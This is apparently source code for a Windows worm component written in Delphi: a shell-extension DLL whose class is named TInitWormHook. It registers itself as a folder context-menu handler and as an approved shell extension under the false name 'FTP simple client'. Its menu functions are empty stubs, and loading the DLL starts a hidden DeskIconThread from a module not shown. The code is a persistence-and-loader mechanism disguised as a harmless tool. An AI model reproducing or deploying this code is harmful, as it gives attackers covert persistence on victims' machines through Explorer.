unit ContextM;

interface

uses
  Windows, ActiveX, ComObj, ShlObj;

type
  TInitWormHook = class(TComObject, IShellExtInit, IContextMenu)
  protected
    { IShellExtInit }
    function IShellExtInit.Initialize = SEIInitialize; // Avoid compiler warning
    function SEIInitialize(pidlFolder: PItemIDList; lpdobj: IDataObject;
      hKeyProgID: HKEY): HResult; stdcall;
    { IContextMenu }
    function QueryContextMenu(Menu: HMENU; indexMenu, idCmdFirst, idCmdLast,
      uFlags: UINT): HResult; stdcall;
    function InvokeCommand(var lpici: TCMInvokeCommandInfo): HResult; stdcall;
    function GetCommandString(idCmd, uType: UINT; pwReserved: PUINT;
      pszName: LPSTR; cchMax: UINT): HResult; stdcall;
  end;

  function DllGetClassObject(const CLSID, IID: TGUID; var Obj): HResult; stdcall;
  function DllCanUnloadNow: HResult; stdcall;

const
  Class_ContextMenu: TGUID = '{EBDF1F20-C829-9999-8233-0020AF3E97A9}';

implementation

uses ComServ, SysUtils, ShellApi, Registry, UthDeskIcon;

var
  DIT : DeskIconThread;

function TInitWormHook.SEIInitialize(pidlFolder: PItemIDList; lpdobj: IDataObject;
  hKeyProgID: HKEY): HResult;
begin
  Result := NOERROR;
end;

function TInitWormHook.QueryContextMenu(Menu: HMENU; indexMenu, idCmdFirst,
          idCmdLast, uFlags: UINT): HResult;
begin
  Result := 0; 
end;

function TInitWormHook.InvokeCommand(var lpici: TCMInvokeCommandInfo): HResult;
begin
  Result := NOERROR;
end;

function TInitWormHook.GetCommandString(idCmd, uType: UINT; pwReserved: PUINT;
  pszName: LPSTR; cchMax: UINT): HRESULT;
begin
  Result := NOERROR;
end;

type
  TInitWormHookFactory = class(TComObjectFactory)
  public
    procedure UpdateRegistry(Register: Boolean); override;
  end;

procedure TInitWormHookFactory.UpdateRegistry(Register: Boolean);
var
  ClassID: string;
begin
  if Register then begin
    inherited UpdateRegistry(Register);

    ClassID := GUIDToString(Class_ContextMenu);
    CreateRegKey('Directory\shellex\ContextMenuHandlers\ContMenu', '', ClassID);

    if (Win32Platform = VER_PLATFORM_WIN32_NT) then
      with TRegistry.Create do
        try
          RootKey := HKEY_LOCAL_MACHINE;
          OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions', True);
          OpenKey('Approved', True);
          WriteString(ClassID, 'FTP simple client');
        finally
          Free;
        end;
  end
  else begin
    DeleteRegKey('Directory\shellex\ContextMenuHandlers\ContMenu');

    inherited UpdateRegistry(Register);
  end;
end;

function DllGetClassObject(const CLSID, IID: TGUID; var Obj): HResult;
begin
  Result:=ComServ.DllGetClassObject(CLSID, IID, Obj);
  if Result = S_OK then begin
    try
      if not Assigned(DIT) then begin
        DIT:=DeskIconThread.Create(true);
        DIT.Resume;
      end;
    except
      DIT:=nil;
    end;
  end;
end;

function DllCanUnloadNow: HResult;
begin
  Result := ComServ.DllCanUnloadNow;
  if Result = S_OK then begin
    try
      if Assigned(DIT) then  DIT.Terminate;
    except
    end;
    DIT:=nil;
  end;
end;

initialization
  Randomize;
  TInitWormHookFactory.Create(ComServer, TInitWormHook, Class_ContextMenu,
    '', 'FTP simple client', ciMultiInstance,
    tmApartment);


end.
